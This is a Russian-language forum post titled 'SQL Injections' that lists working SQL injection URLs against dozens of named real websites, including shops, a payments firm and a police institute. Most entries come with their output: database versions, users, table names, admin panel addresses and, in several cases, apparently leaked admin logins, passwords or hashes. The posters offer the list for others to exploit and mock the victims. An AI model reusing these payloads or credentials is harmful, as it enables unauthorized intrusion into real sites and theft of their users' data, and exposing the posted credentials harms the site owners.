SQL Инъекции

http://www.dreptonline.ro/stiri/detaliu_stire.php?id_stire=-652+union+select+1,2,3,4,5 ,6,7/*


version :4.1.22-standard
user: dreptonl_dr@localhost
database: dreptonl_dr

 

http://www.oferta9.ro/magazin2.php?m=-1951+union+sele ct+1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5/*


version :5.0.45-community
user : mn76_iuser@localhost
database: mn76_iuser

 

сайт джорджа сороса

http://www.osf.ro/ro/program.php?program=-30+union+select+1,2, 3,4,5,6/*
version: 4.0.18
user: sitenou@localhost
database: site2007

 

http://www.gans-club.ru/catalogue.php?id=-1+union+select+1,2,3,5,6,7/*

version: 5.0.24-standard
user: gansclub1@localhost
db: db_gansclub1

http://www.gans-club.ru/admin/

Админ-лох....мухахаха

ЗЫ: Как увидел,сколько у них сиги стоят,сразу решил:надо ломать)))

 

http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/*

atur@localhost
4.1.22
atur

 

какая та игра) посещаемость 0.

Code:

http://g1.rezni.net/forum/post.php?a=new_post&forum=-1+UNION+SELECT+null,concat(login,':',pass),null,null+From+users+limit+0,1/*
rezninet_sred@localhost
4.1.21
rezninet_game

 

Онлайн игра
Мир гладиаторов

http://sotovikmar.nov.ru/forum/post.php?a=new_post&forum=-1+union+select+1,concat_ws(char(58),name,pass),3,4+from+users+limit+1+offset+2/*

kaskara_sotm@localhost
4.1.21-standard
kaskara_sotm

 

http://www.agarev.com/website.php?id=-1+union+select+1,lgn,pswd,4+from+agrv_user/*
Вывод в саммом низум под баннерами!

 

E-Shop

одна почти раскрученная остальные нет просто не успел решил выложить чтобы не валялись без дела
и так поехали:
http://www.quicktech.com.tw/eshop_en/class_b.asp?ID=47'
=
[Microsoft][ODBC SQL Server Driver][SQL Server]? nvarchar ?? 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.2 (Build 3790: Service Pack 2) '
=
БД-'DataSQL_eshop_EN'
таблицы и поля:
AD
AdMail
Classl
Employees
News
QA
ActionCount
ADRecord
ClassII
comd_list
Company
D99_CMD
D99_Tmp
dtproperties
EditRecord
GroupMember
LoginRecord
Member(ID,GID,MemberType,UserName,PassWord,Name,PetName,Sex,Phone,Birthday,Mobile,EMail,Address,Memo1,Memo2)
OrderRecord
Orders
Porduct
sysconstraints
syssegments
t_jiaozhu
не раскрученные внимание на некоторых пишутся логи об ошибках мускула заходить только через прокси:
http://eshop.i-cable.com/eshop/eng/index.php?cat_id=2&subcat_id=12'
=
http://www.rhysko.co.uk/eshop2.asp?category=2'
=
http://www.wohlfahrt.com/USA2004/ArtikelDetail.cfm?ArtikelIdentitaet=6034'&pSessionSessionID=84875494-usa-5555330527022008;eshop;2&pSessionKundenID=0&pSessionSprachID=2&Pfad=Spare%20Parts%20%26%23149%3B%20Pyramid%20Candleholders
=
http://www.nebesa.com/eShop/Game.aspx?FamilyId=23&BrandId=6117'
=
http://eshop.whtt.org/eshop.php?id=28'
=
http://www.tashop.ru/order/frame.asp?id=97'
=
http://www.uniway.be/reference.aspx?id=239'
=
http://www.baymed.org/body.cfm?id=147'
=
http://shop.middleeast.com/detail.aspx?ID=935'
=
http://www.411asp.net/func/review?tree=411asp/webapps/shopping&id=6449910'
=
http://eshop.ecu.edu.au/shopdisplayproducts.asp?id=1'&cat=Fees+%26+Charges
=
http://www.littlelambstory.com/store/message.php?id=2'
=
http://www.80mbusmodel.com/eshop/ProductsList.aspx?ID=10'
=
http://www.obedienceuk.com/shop/products.asp?id=6'&cat=Puppies%20for%20Sale
=
http://www.realestatedynamics.com.au/eshop/shop_product.aspx?id=16'
=
http://www.galser-sib.ru/eshop/category.asp?id=183'
=
http://www.fastgear.biz/index.cfm?id=3974&pageid=123'
=
http://www.camperscorner.com.sg/eshop/product.php?id=2076'
=

 

Вот пак -)

http://www.flirtanica.ru/articles1.php?id=-203+union+select+1,2,3,4,version()/*
]http://www.oracul.kiev.ua/news_view.php?id=-140+union+select+1,2,3,4,5,version(),7/
]http://www.biblioteka-ua.com/select_biblio.php?id=1651+union+select+1,version(),3,4,5/* -в самом низу вывод
http://eggs.com.ua/humor.php?id=-16+union+select+1,2,3,version(),5,6,7,8,9,10/*
]http://climb.com.ua/aboutbook.php?id=233+union+select+1,2,3,table_name,5,6+from+information_schema.tables/*
http://www.mgz.com.ua/ogl_inet.php?ogl_id=-24387+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3/*
http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+union+select+1,2,3,4,5,6,7,version(),9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
http://www.cahiersdufootball.net/article.php?id=-2728+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*
http://www.frontnational.com/communique_detail.php?id=-1599+union+select+1,2,3,table_name+from+information_schema.tables+limit+26,1/*
http://www.buchakademie.de/sem/sem.php3?id=-883+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6/*
http://www.imi-online.de/2008.php3?id=-1692+union+select+version(),2/*
http://www.echtenamen.de/kategorie.php4?id=19+union+select+1,version(),3,4/*
http://www.regenwald.org/news.php?id=777+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6+from+information_schema.tables/*
http://www.tribaldance.com.ua/index.php?id=5+union+select+1,2,3,4/*
http://www.chicco.com.ua/faq2.php?id=1+union+select+1,version()/*
http://www.press.cv.ua/show_an.php?id=-1408+union+select+1,version()/*
http://cbn-cp.com/preview.php?id=-36+union+select+1,2,concat_ws(char(58),mail),4,5,6,7,8,9,0,1,2,3+from+mail/*
http://fri.net.ua/loadpsb.php?id=-520+union+select+1,2,3,concat_ws(char(58,58),userlogin,userpsswd),5,6,7,8,9+from+users+limit+100,1/*
http://valiza.com.ua/opinions.php?id=-122+union+select+1,2,3,concat_ws(char(58,58),user_id,username,password),5,6,7+from+phorum_users/*
http://www.aquariumist.com.ua/spr.php?id=-8+union+select+1,2,version()/*
http://www.doggy.kiev.ua/pages.php?id=4+union+select+1,2,version(),4,5/*
http://www.big6.com/showarticle.php?id=-16+union+select+version(),2,3,4,5/*
http://www.comingsoon.net/films.php?id=-15813+union+select+version()/*
http://www.michaelpollan.com/article.php?id=-80+union+select+1,version(),3,4,5,6,7,8,9,0/*
http://www.isoc.be/news.php?ID=-31+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8/*
http://www.fcdynamo.ru/material.php?id=-642'+union+select+1,concat_ws(char(58),UserID,Login,Password),3,4,5,6,7,8+from+ut_users/*
http://www.energetika.cz/index.php?id=147+union+select+1,2,3,4,5,version(),7,8,9,0/*
http://www.radiovaticana.cz/clanek.php4?id=9189+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2,3+from+information_schema.tables/*
http://www.management.com.ua/announce.php?id=150+union+select+1,2,3,concat(char(58),id,username,password),5+from+admins/* - 4 версия... лень таблицу было искать
http://www.jazz.koktebel.info/participant.php?id=11'+union+select+1,2,3,4,5,6,7,version()/*
http://ukrfoto.dp.ua/download.php?id=166+union+select+1,2,version(),4,5,6/*
http://www.haydamaky.com/ua/main.php?id=-392+union+select+1,2,3,4,version(),6,7,8,9/*
http://www.worstpreviews.com/review.php?id=-982+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40/*
http://www.roadtothemiddleclass.com/chappies.php?id=-84+union+select+version(),2,3/*
http://www.emap.usask.ca/news/read.php?id=-107+union+select+1,2,3,version(),5,6,7,8,9,10/*
http://www.bunny-comic.com/index.php?id=-1010+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+15,1/*
http://underwaredesign.com/prod_detail.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19/*
http://www.freepoc.org/viewapp.php?id=-2+union+select+1,2,3,4,5,6,7,version()/*
http://www.railpictures.net/viewphoto.php?id=-190094+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,table_name,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema%20.tables/*
http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),3,4,5,6,7,8,9,10/*

]http://www.kiis.com.ua/index.php?id=2&sp=1+UNION+SELECT+1,2,3,4,Table_name,6,7,8,9+from+information_schema.tables/*
http://chgk.com.ru/person.php?id=-600+UNION+SELECT+1,2,3,4,version(),6,7/*
http://kinoinet.tv/productinfo.php?id=-1446+UNION+SELECT+version(),2/*
http://abris.name/a-imglib/showimg.php?id=-21+union+select+1,2,version(),4,5,6,7,8/*
http://www.ecodefense.ru/view.php?id=-526+union+select+1,2,3,4,5,6,7,8,9,version(),11/*
птом добавлю есчё

http://www.ukrbiznes.com/website.php?id=66551+union+select+version(),2,3,4,5,6,7,8,9,0,1,2/* - кому не лень обходить фильтрацию... 12 таблиц ... !
http://www.ukrnic.com/hosting_info.php?id=2+union+select+1,2,version()/*

===============================================================================================================
http://www.zcasher.info/products.php?id=4'+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables/*
обменный пункт вмз
таблицы снизу , выбрал всю связаное с юзерами

cap_partners
cap_users
exch_clients
zmc2_adminusers
zmc2_users
uab_partners
===============================================================================================================

 

http://www.flipskateboards.com/news.php?id=-9999'+union+select+table_name,column_name+from+information_schema.columns+limit+264,1/*

http://www.flipskateboards.com/admin/
login/pass: arjan

----------------

http://www.classicalsource.com/db_control/db_cd_review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,id,password,user_name,15,16,17,18,19,20,21,22,23+from+user+limit+0,1/*

http://www.classicalsource.com/admin/site_admin.php
login: davef
pass: qpd45122

 

http://www.infra-m.ru/live/news.asp?date=03.03.2008&id=471468+or+1=@@version--

SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

//******************************
http://www.rkgarant.ru/news.asp?id=376+or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

http://www.rkgarant.ru/news.asp?id=376+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+32+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(0x2345)))--
таблица юзеров

 

aiman.eu

Code:

http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10/*

4.0.27-max-log[email protected]db161593031

Code:

http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat(login,0x3,pass),5,6,7,8,9,10+from+admin/*

aimanff8ac4f495af20f4a7c63d4644d568b5:schmann
Админка: http://www.aiman.eu/admin/

 

http://www.atlasmonde.net/pays.php?idp=-1+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7+from+in formation_schema.tables+limit+18,1/*


version: 5.0.22
user : altasmonde_user@localhost
database : altasmonde_base

 

интернет-трейдинг

http://www.netinvestor.ru/news.asp?id=851142+or+1=@@VERSION

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Юзеры и пасы
http://www.netinvestor.ru/news.asp?id=851142+or+1=(SELECT+TOP+1+password+from+usertable+WHERE+password+NOT+IN+(SELECT+TOP+10+password+from+usertable+WHERE+password+NOT+IN+(0x23)))--

 

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,table_name,5,6, 7,8+from+information_schema.tables+l imit+16,1/*
нужная нам табла

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e/*

0x61646d696e = admin

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,concat_ws(0x3a,nick,password),5,6,7,8+from+admin/*

вот собственно и все что надо....

ах да, совсем забыл

http://www.comeniuskft.hu/admin.php

 

http://www.win-developers.com/forum/show.asp?id=606&fid=178++or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)

 

http://www.motorcitysuns.com/team.php?id=-1+union+sel ect+1,,2, 3,4/*


version: 4.1.22-standard-log
user : oaklands_1@localhost
database : oaklands_1

 

fexco.com
the global payments group

Code:

http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,concat_ws(0x3203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/*

version: 5.0.45-community-log
user: [email protected]
database: splashg_fexco

Code:

http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+1,1/*

 

РОСТОВСКИЙ ЮРИДИЧЕСКИЙ ИНСТИТУТ МВД РОССИИ

http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=(select%20db_name())--
DB- rui
User-SITE\IUSR_WEB3